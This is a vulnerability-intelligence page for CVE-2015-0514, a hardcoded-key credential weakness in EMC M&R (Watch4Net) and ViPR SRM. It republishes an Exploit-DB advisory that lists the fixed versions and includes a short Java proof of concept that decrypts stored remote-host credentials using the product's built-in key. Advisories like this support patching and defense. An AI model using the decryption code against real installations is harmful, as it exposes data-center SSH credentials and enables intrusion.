VIR Vulnerability Intelligence Relay

CVE-2015-0514

medium
Published 2015-01-21 ยท Modified 2026-05-06
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
6.0

Description

EMC M&R (aka Watch4Net) before 6.5u1 and ViPR SRM before 3.6.1 might allow remote attackers to obtain cleartext data-center discovery credentials by leveraging certain SRM access to conduct a decryption attack.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-36436 webapps java text ยท 2 KB
Han Sahin ยท 2015-03-19

EMC M&R (Watch4net) - Credential Disclosure

text exploit Source: Exploit-DB 
Abstract


It was discovered that EMC M&R (Watch4net) credentials of remote servers stored in Watch4net are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.

Affected products


EMC reports that the following products are affected by this vulnerability:

- EMC M&R (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1

See also


- CVE-2015-0514
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)

Fix


EMC released the following updated versions that resolve this vulnerability:

- EMC M&R (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.

Introduction


EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.

The Remote-Shell-Collector module from EMC M&R (Watch4net) can push and run executable files on remote hosts to collect performance data from storage environments. Remote-Shell-Collector uses SSH for this purpose.

In order to push and collect monitoring data, accounts are created on the remote servers and credentials of these remote servers are stored in Watch4net. These credentials are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.

Details


Due to insecure use of cryptography the credentials of these remote host can be decrypted using the Java class com.watch4net.apg.v2.common.config.tools.Utils.process().

Proof of concept


import com.watch4net.apg.v2.common.config.tools.Utils;

public class Watch4NetCrypt {
   private static void print(String out) {
      System.out.println(out);
   }

   private static void usage() {
      print("Usage:\t watch4netcrypt [-e] password");
      print("\t watch4netcrypt [-d] encrypted");
      System.exit(1);
   }

   public static void main(String[] args) {
      if (args.length != 2 || !("-e".equals(args[0]) || "-d".equals(args[0]))) {
         usage();
      }
      Boolean encrypt = "-e".equals(args[0]);
      String password = args[1];
      if (password != null) {
         print(Utils.process(password, encrypt, "centralized", null));
      }
}

Application impact
VendorProductVersionsFixed
dell emcwatch4net{"endIncluding":"6.5"}
dell emcvipr_srm{"endIncluding":"3.6.0"}

References

CWEs

CWE-200

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.